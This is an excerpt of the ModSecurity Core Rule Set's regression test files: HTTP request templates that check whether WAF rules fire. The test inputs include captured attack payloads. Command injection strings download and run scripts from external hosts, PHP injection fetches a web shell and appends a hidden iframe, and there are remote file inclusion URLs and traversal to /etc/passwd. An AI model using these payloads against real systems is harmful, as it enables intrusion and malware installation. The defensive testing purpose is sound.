11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 %test Uploaded file size too large (960342) ##################################################### %status 413 %output 960342 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: 10485760 -----------------------------265001916915724 Content-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %endtest 
�����������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_30_http_policy.tests����������������������������������������������������������������0000664�0000000�0000000�00000006662�12164572564�0035340�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 30 - HTTP Policy %test Method is not allowed by policy (960032) ##################################################### %output 960032 %var request_method=DELETE %var request_method=FOO %var request_method=SUBSCRIBE %request $request_method / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request content type is not allowed by policy (960010) ##################################################### %output 960010 %var type=multipart/; %var type=multipart/foo; %var type=application/foo; %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: $type boundary=0000 Content-Length: $CONTENT_LENGTH --0000 
Content-Disposition: form-data; name="name" John Smith --0000 Content-Disposition: form-data; name="email" john.smith@example.com --0000 Content-Disposition: form-data; name="image"; filename="image.jpg" Content-Type: image/jpeg BINARYDATA --0000-- %test HTTP protocol version is not allowed by policy (960034) ##################################################### %output 960034 %var http=HTTP/3.0 %var http=HTTP/0.8 %var http=JUNK/1.0 %request GET / $http Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test URL file extension is restricted by policy (960035) ##################################################### %output 960035 %var ext=.bak %var ext=.db %var ext=.old %request GET /foo$ext HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test HTTP header is restricted by policy (960038) ##################################################### %output 960038 %var restricted_header=Proxy-Connection: keep-alive %var restricted_header=Translate: f %var restricted_header=Lock-Token: <opaquelocktoken:a515cfa4-5da4-22e1-f5bf-00a0451e6bf7> %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 $restricted_header Keep-Alive: 300 Proxy-Connection: keep-alive %endtest ������������������������������������������������������������������������������modsecurity_crs_35_bad_robots.tests�����������������������������������������������������������������0000664�0000000�0000000�00000004451�12164572564�0035117�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 35 - HTTP Bad Robots %test Request Indicates a Security Scanner Scanned the Site (990002) ##################################################### %output 990002 %var ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij %var ua=Arachni/0.2.1 %var ua=w3af.sourceforge.net %request GET / HTTP/1.0 Host: $hostname User-Agent: $ua Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Indicates a Security Scanner Scanned the Site (990901) ##################################################### %output 990901 %var header=Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION) %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) $header Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: 
keep-alive %test Request Indicates a Security Scanner Scanned the Site (990902) ##################################################### %output 990902 %var file=/nessustest %request GET $file HTTP/1.0 Host: $hostname User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) $header Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Rogue web site crawler (990012) ##################################################### %output 990012 %var ua=DataCha0s/2.0 %var ua=Morfeus Fucking Scanner %var ua=VoidEYE %request GET / HTTP/1.0 Host: $hostname User-Agent: $ua Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_40_generic_attacks.tests������������������������������������������������������������0000775�0000000�0000000�00000046227�12164572564�0036135�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 6 %test System Command Injection (950907) ################################### %output 950907 %var 
command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt'); %var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php %request GET /?foo=$command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Injection of Undocumented ColdFusion Tags (950008) ################################### %output 950008 %var cf_command=cfusion_decrypt(string%2ckey) %var cf_command=%3CCFINTERNALDEBUG%20ACTION%3D%22pcode%22%20OUTVAR%3D%22r_var%22%20TEMPLATEPATH%3D%22%23template%23%22%3E %request GET /?foo=$cf_command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test LDAP Injection Attack (950010) ################################### %output 950010 %var ldap_command=jsmith)(|(objectclass=*) %var ldap_command=joe)(|(password=* %var ldap_command=(&(objectClass=*)(objectClass=resources)) %request GET /?foo=$ldap_command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test SSI Injection Attack (950011) ################################### %output 950011 %var ssi_command=%3C!--%23exec%20cmd%3D%22ls%22%20--%3E %var ssi_command=%3C!--%23include%20virtual%3D%22%2Fetc%2Fpasswd%22%20--%3E %request GET /?foo=$ssi_command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Universal PDF XSS URL Detected (950018) ################################### %output 950018 %var updf=http%3A%2F%2Fwww.example.com%2Ffile.pdf%23a%3Djavascript%3Aalert('Alert') %request GET /?foo=$updf HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Email Injection 
Attack (950019) ##################################################### %output 950019 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH body=email@anonymous.xxx%0ATo:email1@who.xxx %test HTTP Request Smuggling Attack (950012) ################################### %output 950012 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Transfer-Encoding: utf-8 Transfer-Encoding: utf-8 Keep-Alive: 300 Proxy-Connection: keep-alive %test HTTP Request Smuggling (950012) ################################### %output 950012 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Keep-Alive: 300 Proxy-Connection: keep-alive Content-Length: 3 Content-Length: 3 abc %test HTTP response splitting (950910) ################################### %output 950910 %request GET 
/?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test HTTP response splitting (950911) ################################### %output 950911 %request GET /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950117) ################################### %output 950117 %request GET /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950118) ################################### %output 950118 %var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt?? 
%var rfi=/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt %var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt %request GET $rfi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950119) ################################### %output 950119 %var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt? %var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt???? %var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt???? %request GET $rfi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Inclusion Attack (950120) ################################### %output 950120 %var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt?? %var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt? %var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt??? 
%request GET $rfi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Session Fixation Attack (950009) ################################### %output 950009 %request GET /foo.php?bar=blah<script>document.cookie="sessionid=1234;%20domain=.example.dom";</script> HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.mummy.com/index.html Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Session Fixation Attack (950000) ################################### %output 950000 %request GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test Session Fixation Attack (950003) ################################### %output 950003 %request GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Referer: http://forum.antichat.ru/forum127.html Keep-Alive: 300 Proxy-Connection: keep-alive %test Remote File Access Attempt (950005) ################################### %output 950005 %var file=../../../../../boot.ini %var file=/etc/passwd %var file=../../../../../../../../../../usr/local/app/apache2/conf/httpd.conf %request GET /index.php?file=News&op=$file%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test System Command Access (950002) ################################### %output 950002 %var file=/d/winnt/system32/cmd.exe?/c+dir. %request GET /foo.aspx?$file HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Accept-Language: zh-sg Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: $hostname Keep-Alive: 300 Proxy-Connection: keep-alive %test System Command Injection (950006) ################################### %output 950006 %var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt'); %var 
command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php %request GET /?foo=$command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test PHP Injection Attack (959151) ################################### %output 959151 %var command=<?exec('wget%20http://r57.biz/r57.txt%20-O shell.php');?> %var command=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E %request GET /?foo=$command HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; 